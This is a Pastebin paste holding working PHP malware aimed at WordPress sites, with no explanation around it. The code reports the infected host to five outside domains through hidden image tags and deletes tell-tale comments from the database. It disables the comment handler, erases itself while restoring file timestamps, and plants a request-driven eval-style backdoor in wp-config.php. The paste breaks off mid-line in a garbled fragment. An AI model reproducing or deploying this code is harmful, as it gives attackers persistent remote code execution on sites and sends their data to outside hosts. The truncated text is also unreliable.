Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- function Uno_encode($String)
- {
- return urlencode(base64_encode(~$String));
- }
- function report($rcd){
- $recivers[] = 'http://rp.cd-kyywater.com/';
- $recivers[] = 'http://rp.byby-sh5.com/';
- $recivers[] = 'http://rp.titianjewelry.com/';
- $recivers[] = 'http://rp.tumourhealth.com/';
- $recivers[] = 'http://rp.china-touyingji.com/';
- $z = str_replace('wp-content/plugins/hello.php','',$_SERVER["REQUEST_URI"]);
- $report = Uno_encode($_SERVER["HTTP_HOST"]. $z . '|' . $rcd);
- shuffle($recivers);
- foreach($recivers as $t){
- echo '<img width=1 height=1 src="' .$t . '?data=' .$report.'">';
- }
- }
- function remove_comment(){
- include_once('../../wp-config.php');
- $con = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
- mysql_select_db(DB_NAME, $con);
- $zapros = 'delete from ' . $table_prefix . 'comments where comment_content like \'%atob%\';';
- $r = mysql_query($zapros);
- mysql_close($con);
- }
- function patch_wp(){
- $fname = '../../wp-comments-post.php';
- if(file_exists($fname)){
- $t = '<?php die(); ?>' . PHP_EOL;
- $time = filemtime($fname);
- $writ = false;
- if (!is_writable($fname)){
- $perm = substr(sprintf('%o', fileperms($fname)), -4);
- @chmod($fname,0666);
- $writ = true;
- }
- clearstatcache();
- if (is_writable($fname)){
- $tmp = @file_get_contents($fname);
- $tmp = $t . $tmp;
- }
- if (strlen($tmp) > 10){
- $f = fopen($fname,"w");
- fputs($f,$tmp);
- fclose($f);
- }
- clearstatcache();
- if ($writ){
- for($i=strlen($perm)-1;$i>=0;--$i){
- $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
- }
- @chmod($fname,$perms);
- }
- @touch($fname,$time);
- }
- }
- function self_remove(){
- $fname = __FILE__;
- $time = filemtime($fname);
- $writ = false;
- if (!is_writable($fname)){
- $perm = substr(sprintf('%o', fileperms($fname)), -4);
- @chmod($fname,0666);
- $writ = true;
- }
- clearstatcache();
- if (is_writable($fname)){
- $tmp = @file_get_contents($fname);
- $pos = strpos($tmp,'1764d133d7351bf6'.'a27d2deb3c521a02');
- $tmp = substr($tmp,$pos + 32);
- if (strlen($tmp) > 10){
- $f = fopen($fname,"w");
- fputs($f,$tmp);
- fclose($f);
- }
- clearstatcache();
- if ($writ){
- for($i=strlen($perm)-1;$i>=0;--$i){
- $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
- }
- @chmod($fname,$perms);
- }
- @touch($fname,$time);
- }
- }
- $fname = '../../wp-config.php';
- if(file_exists($fname)){
- $rcd = md5($_SERVER["HTTP_HOST"].$_SERVER["HTTP_USER_AGENT"].rand(0,10000));
- $t = 'if (isset($_REQUEST[\'FILE\'])){$_SERVERS = strrev($_REQUEST[\''.$rcd.'\']);$_FILE = $_SERVERS(\'$_\',strrev($_REQUEST[\'FILE\']).\'($_);\');$_FILE(stripslashes($_REQUEST[\'HOST\']));}';
- $time = filemtimbase64: invalid input
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement